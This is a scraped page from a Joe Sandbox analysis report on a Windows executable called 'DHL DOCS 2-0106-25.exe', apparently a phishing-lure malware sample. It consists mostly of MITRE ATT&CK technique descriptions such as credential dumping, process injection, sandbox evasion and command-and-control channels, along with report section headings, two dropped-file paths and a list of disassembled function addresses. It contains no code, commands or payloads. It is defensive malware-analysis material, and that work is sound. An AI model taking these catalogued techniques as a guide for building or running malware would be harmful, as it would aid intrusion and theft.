Associated: 00000000.00000002.1659452562.0000000000284000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_1b0000_DHL DOCS 2-0106-25.jbxd

Similarity

API ID: FindMessagePostSleepWindow
String ID: Shell_TrayWnd
API String ID: 529655941-2988720461
Opcode ID: e397802a148695a5c7a2e4e68ab203d1c9dd54fc052e16a1fd93a2f3caa1f329
Instruction ID: 80563e2d31249e039cfa295a2de972c903612479acf86070077fb524c7032412
Opcode Fuzzy Hash: e397802a148695a5c7a2e4e68ab203d1c9dd54fc052e16a1fd93a2f3caa1f329
Instruction Fuzzy Hash: E5D0A9763D23007AE6A8A330AC0FFCAA6189B02B00F1189027706AA0D0C8B0A8008A04

Description:	Adversaries may obtain and abuse credentials of existing accounts as a means of gaining Initial Access, Persistence, Privilege Escalation, or Defense Evasion. Compromised credentials may be used to bypass access controls placed on various resources on systems within the network and may even be used for persistent access to remote systems and externally available services, such as VPNs, Outlook Web Access, network devices, and remote desktop.Compromised credentials may also grant an adversary increased privilege to specific systems or access to restricted areas of the network. Adversaries may choose not to use malware or tools in conjunction with the legitimate access those credentials provide to make it harder to detect their presence.
Tactics:	Defense Evasion, Initial Access, Persistence, Privilege Escalation
Data Sources:	Logon Session: Logon Session Creation, Logon Session: Logon Session Metadata, User Account: User Account Authentication
Platforms:	Azure AD, Containers, Google Workspace, IaaS, Linux, macOS, Network, Office 365, SaaS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may interact with the native OS application programming interface (API) to execute behaviors. Native APIs provide a controlled means of calling low-level OS services within the kernel, such as those involving hardware/devices, memory, and processes.These native APIs are leveraged by the OS during system boot (when other system components are not yet initialized) as well as carrying out tasks and requests during routine operations.
Tactics:	Execution
Data Sources:	Module: Module Load, Process: OS API Execution
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may execute their own malicious payloads by side-loading DLLs. Similar to DLL Search Order Hijacking , side-loading involves hijacking which DLL a program loads. But rather than just planting the DLL within the search order of a program then waiting for the victim application to be invoked, adversaries may directly side-load their payloads by planting then invoking a legitimate application that executes their payload(s).
Tactics:	Defense Evasion, Persistence, Privilege Escalation
Data Sources:	File: File Creation, File: File Modification, Module: Module Load, Process: Process Creation
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may exploit software vulnerabilities in an attempt to elevate privileges. Exploitation of a software vulnerability occurs when an adversary takes advantage of a programming error in a program, service, or within the operating system software or kernel itself to execute adversary-controlled code. Security constructs such as permission levels will often hinder access to information and use of certain techniques, so adversaries will likely need to perform privilege escalation to include use of software exploitation to circumvent those restrictions.
Tactics:	Privilege Escalation
Data Sources:	Driver: Driver Load, Process: Process Creation
Platforms:	Containers, Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may circumvent mechanisms designed to control elevate privileges to gain higher-level permissions. Most modern systems contain native elevation control mechanisms that are intended to limit privileges that a user can perform on a machine. Authorization has to be granted to specific users in order to perform tasks that can be considered of higher risk. An adversary can perform several methods to take advantage of built-in control mechanisms in order to escalate privileges on a system.
Tactics:	Defense Evasion, Privilege Escalation
Data Sources:	Command: Command Execution, File: File Metadata, File: File Modification, Process: OS API Execution, Process: Process Creation, Process: Process Metadata, User Account: User Account Modification, Windows Registry: Windows Registry Key Modification
Platforms:	Azure AD, Google Workspace, IaaS, Linux, macOS, Office 365, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may modify access tokens to operate under a different user or system security context to perform actions and bypass access controls. Windows uses access tokens to determine the ownership of a running process. A user can manipulate access tokens to make a running process appear as though it is the child of a different process or belongs to someone other than the user that started the process. When this occurs, the process also takes on the security context associated with the new token.
Tactics:	Defense Evasion, Privilege Escalation
Data Sources:	Active Directory: Active Directory Object Modification, Command: Command Execution, Process: OS API Execution, Process: Process Creation, Process: Process Metadata, User Account: User Account Metadata
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may inject code into processes in order to evade process-based defenses as well as possibly elevate privileges. Process injection is a method of executing arbitrary code in the address space of a separate live process. Running code in the context of another process may allow access to the process's memory, system/network resources, and possibly elevated privileges. Execution via process injection may also evade detection from security products since the execution is masked under a legitimate process.
Tactics:	Defense Evasion, Privilege Escalation
Data Sources:	File: File Metadata, File: File Modification, Module: Module Load, Process: OS API Execution, Process: Process Access, Process: Process Metadata, Process: Process Modification
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may modify and/or disable security tools to avoid possible detection of their malware/tools and activities. This may take many forms, such as killing security software processes or services, modifying / deleting Registry keys or configuration files so that tools do not operate properly, or other methods to interfere with security tools scanning or reporting information. Adversaries may also disable updates to prevent the latest security patches from reaching tools on victim systems.
Tactics:	Defense Evasion
Data Sources:	Command: Command Execution, Driver: Driver Load, Process: Process Creation, Process: Process Termination, Sensor Health: Host Status, Service: Service Metadata, Windows Registry: Windows Registry Key Deletion, Windows Registry: Windows Registry Key Modification
Platforms:	Containers, IaaS, Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may use Obfuscated Files or Information to hide artifacts of an intrusion from analysis. They may require separate mechanisms to decode or deobfuscate that information depending on how they intend to use it. Methods for doing that include built-in functionality of malware or by using utilities present on the system.
Tactics:	Defense Evasion
Data Sources:	File: File Modification, Process: Process Creation, Script: Script Execution
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to make an executable or file difficult to discover or analyze by encrypting, encoding, or otherwise obfuscating its contents on the system or in transit. This is common behavior that can be used across different platforms and the network to evade defenses.
Tactics:	Defense Evasion
Data Sources:	Command: Command Execution, File: File Creation, File: File Metadata, Module: Module Load, Process: OS API Execution, Process: Process Creation, Script: Script Execution, WMI: WMI Creation, Windows Registry: Windows Registry Key Creation
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may employ various means to detect and avoid virtualization and analysis environments. This may include changing behaviors based on the results of checks for the presence of artifacts indicative of a virtual machine environment (VME) or sandbox. If the adversary detects a VME, they may alter their malware to disengage from the victim or conceal the core functions of the implant. They may also search for VME artifacts before dropping secondary or additional payloads. Adversaries may use the information learned from [Virtualization/Sandbox Evasion](https://attack.mitre.org/techniques/T1497) during automated discovery to shape follow-on behaviors.
Tactics:	Defense Evasion, Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to dump credentials to obtain account login and credential material, normally in the form of a hash or a clear text password, from the operating system and software. Credentials can then be used to perform Lateral Movement and access restricted information.
Tactics:	Credential Access
Data Sources:	Active Directory: Active Directory Object Access, Command: Command Execution, File: File Access, Network Traffic: Network Traffic Content, Network Traffic: Network Traffic Flow, Process: OS API Execution, Process: Process Access, Process: Process Creation, Windows Registry: Windows Registry Key Access
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may use methods of capturing user input to obtain credentials or collect information. During normal system usage, users often provide credentials to various different locations, such as login pages/portals or system dialog boxes. Input capture mechanisms may be transparent to the user (e.g. Credential API Hooking ) or rely on deceiving the user into providing input into what they believe to be a genuine service (e.g. Web Portal Capture ).
Tactics:	Collection, Credential Access
Data Sources:	Driver: Driver Load, File: File Modification, Process: OS API Execution, Process: Process Creation, Process: Process Metadata, Windows Registry: Windows Registry Key Modification
Platforms:	Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	An adversary may gather the system time and/or time zone from a local or remote system. The system time is set and stored by the Windows Time Service within a domain to maintain time synchronization between systems and services in an enterprise network.
Tactics:	Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation
Platforms:	Network, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to get a listing of valid accounts, usernames, or email addresses on a system or within a compromised environment. This information can help adversaries determine which accounts exist, which can aid in follow-on behavior such as brute-forcing, spear-phishing attacks, or account takeovers (e.g., Valid Accounts ).
Tactics:	Discovery
Data Sources:	Command: Command Execution, File: File Access, Process: Process Creation
Platforms:	Azure AD, Google Workspace, IaaS, Linux, macOS, Office 365, SaaS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may enumerate files and directories or may search in specific locations of a host or network share for certain information within a file system. Adversaries may use the information from File and Directory Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation
Platforms:	Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	An adversary may attempt to get detailed information about the operating system and hardware, including version, patches, hotfixes, service packs, and architecture. Adversaries may use the information from System Information Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation
Platforms:	IaaS, Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to get information about running processes on a system. Information obtained could be used to gain an understanding of common software/applications running on systems within the network. Adversaries may use the information from Process Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation
Platforms:	Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to identify the primary user, currently logged in user, set of users that commonly uses a system, or whether a user is actively using the system. They may do this, for example, by retrieving account usernames or by using OS Credential Dumping . The information may be collected in a number of different ways using other Discovery techniques, because user and username details are prevalent throughout a system and include running process ownership, file/directory ownership, session information, and system logs. Adversaries may use the information from [System Owner/User Discovery](https://attack.mitre.org/techniques/T1033) during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	Active Directory: Active Directory Object Access, Command: Command Execution, File: File Access, Network Traffic: Network Traffic Content, Network Traffic: Network Traffic Flow, Process: OS API Execution, Process: Process Access, Process: Process Creation, Windows Registry: Windows Registry Key Access
Platforms:	Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	An adversary may compress and/or encrypt data that is collected prior to exfiltration. Compressing the data can help to obfuscate the collected data and minimize the amount of data sent over the network. Encryption can be used to hide information that is being exfiltrated from detection or make exfiltration less conspicuous upon inspection by a defender.
Tactics:	Collection
Data Sources:	Command: Command Execution, File: File Creation, Process: Process Creation, Script: Script Execution
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Behavior Section

Behavior Chronological

Disassembly

Uncategorized

Graph

Loading Joe Sandbox Report ...

Warning!

Windows Analysis Report DHL DOCS 2-0106-25.exe

Overview

General Information

Detection

Signatures

Classification

Process Tree

Malware Threat Intel

Malware Configuration

Yara Signatures

Memory Dumps

Unpacked PEs

Sigma Signatures

System Summary

Suricata Signatures

Joe Sandbox Signatures

AV Detection

Compliance

Spreading

Software Vulnerabilities

Networking

Key, Mouse, Clipboard, Microphone and Screen Capturing

E-Banking Fraud

System Summary

Data Obfuscation

Hooking and other Techniques for Hiding and Protection

Malware Analysis System Evasion

Anti Debugging

HIPS / PFW / Operating System Protection Evasion

Language, Device and Operating System Detection

Stealing of Sensitive Information

Remote Access Functionality

Mitre Att&ck Matrix

Behavior Graph

Screenshots

Thumbnails

Antivirus, Machine Learning and Genetic Malware Detection

Initial Sample

Dropped Files

Unpacked PE Files

Domains

URLs

Domains and IPs

Contacted Domains

Contacted URLs

URLs from Memory and Binaries

World Map of Contacted IPs

Public IPs

General Information

Warnings

Simulations

Behavior and APIs

Joe Sandbox View / Context

IPs

Domains

ASNs

JA3 Fingerprints

Dropped Files

Created / dropped Files

C:\Users\user\AppData\Local\Temp\9250-GI

C:\Users\user\AppData\Local\Temp\conged

Static File Info

General

File Icon

Static PE Info

General

Entrypoint Preview

Rich Headers

Data Directories

Sections

Resources

Imports

Possible Origin

Windows Analysis Report
DHL DOCS 2-0106-25.exe

Function 001B42DE Relevance: 21.2, APIs: 9, Strings: 3, Instructions: 235
libraryloaderCOMMON

Function 001B42A2 Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 61
COMMON

Function 001F2BA5 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 62
COMMON

Function 001B344D Relevance: 19.5, APIs: 6, Strings: 5, Instructions: 201
registryCOMMON

Function 001B2CD4 Relevance: 19.3, APIs: 7, Strings: 4, Instructions: 53
windowregistryCOMMON

Function 001F065B Relevance: 17.8, APIs: 9, Strings: 1, Instructions: 272
COMMONLIBRARYCODE

Function 001B2B83 Relevance: 17.6, APIs: 7, Strings: 3, Instructions: 63
windowregistryCOMMON

Function 001B3170 Relevance: 15.9, APIs: 8, Strings: 1, Instructions: 145
windowtimeregistryCOMMON

Function 01189F08 Relevance: 10.7, APIs: 7, Instructions: 239
fileCOMMON

Function 001B10F3 Relevance: 10.7, APIs: 3, Strings: 3, Instructions: 153
comCOMMON

Function 001B2C63 Relevance: 10.5, APIs: 4, Strings: 2, Instructions: 44
COMMON

Function 01189CD8 Relevance: 8.9, APIs: 4, Strings: 1, Instructions: 146
fileCOMMON

Function 001B3B1C Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 58
registryCOMMON

Function 01188BC8 Relevance: 6.7, APIs: 4, Instructions: 720
processthreadCOMMON

Description:	Adversaries may search local system sources, such as file systems and configuration files or local databases, to find files of interest and sensitive data prior to Exfiltration.
Tactics:	Collection
Data Sources:	Command: Command Execution, File: File Access, Process: OS API Execution, Process: Process Creation, Script: Script Execution
Platforms:	Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may target user email to collect sensitive information. Emails may contain sensitive data, including trade secrets or personal information, that can prove valuable to adversaries. Adversaries can collect or forward email from mail servers or clients.
Tactics:	Collection
Data Sources:	Application Log: Application Log Content, Command: Command Execution, File: File Access, Logon Session: Logon Session Creation, Network Traffic: Network Connection Creation
Platforms:	Google Workspace, Linux, macOS, Office 365, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may collect data stored in the clipboard from users copying information within or between applications.
Tactics:	Collection
Data Sources:	Command: Command Execution, Process: OS API Execution
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may transfer tools or other files from an external system into a compromised environment. Tools or files may be copied from an external adversary-controlled system to the victim network through the command and control channel or through alternate protocols such as ftp . Once present, adversaries may also transfer/spread tools between victim devices within a compromised environment (i.e. Lateral Tool Transfer ).
Tactics:	Command and Control
Data Sources:	Command: Command Execution, File: File Creation, Network Traffic: Network Connection Creation, Network Traffic: Network Traffic Content, Network Traffic: Network Traffic Flow
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may employ a known encryption algorithm to conceal command and control traffic rather than relying on any inherent protections provided by a communication protocol. Despite the use of a secure algorithm, these implementations may be vulnerable to reverse engineering if secret keys are encoded and/or generated within malware samples/configuration files.
Tactics:	Command and Control
Data Sources:	Network Traffic: Network Traffic Content
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may use an OSI non-application layer protocol for communication between host and C2 server or among infected hosts within a network. The list of possible protocols is extensive.Specific examples include use of network layer protocols, such as the Internet Control Message Protocol (ICMP), transport layer protocols, such as the User Datagram Protocol (UDP), session layer protocols, such as Socket Secure (SOCKS), as well as redirected/tunneled protocols, such as Serial over LAN (SOL).
Tactics:	Command and Control
Data Sources:	Network Traffic: Network Traffic Content, Network Traffic: Network Traffic Flow
Platforms:	Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may communicate using OSI application layer protocols to avoid detection/network filtering by blending in with existing traffic. Commands to the remote system, and often the results of those commands, will be embedded within the protocol traffic between the client and server.
Tactics:	Command and Control
Data Sources:	Network Traffic: Network Traffic Content, Network Traffic: Network Traffic Flow
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may shutdown/reboot systems to interrupt access to, or aid in the destruction of, those systems. Operating systems may contain commands to initiate a shutdown/reboot of a machine or network device. In some cases, these commands may also be used to initiate a shutdown/reboot of a remote computer or network device via Network Device CLI (e.g. `reload` ).
Tactics:	Impact
Data Sources:	Command: Command Execution, Process: Process Creation, Sensor Health: Host Status
Platforms:	Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre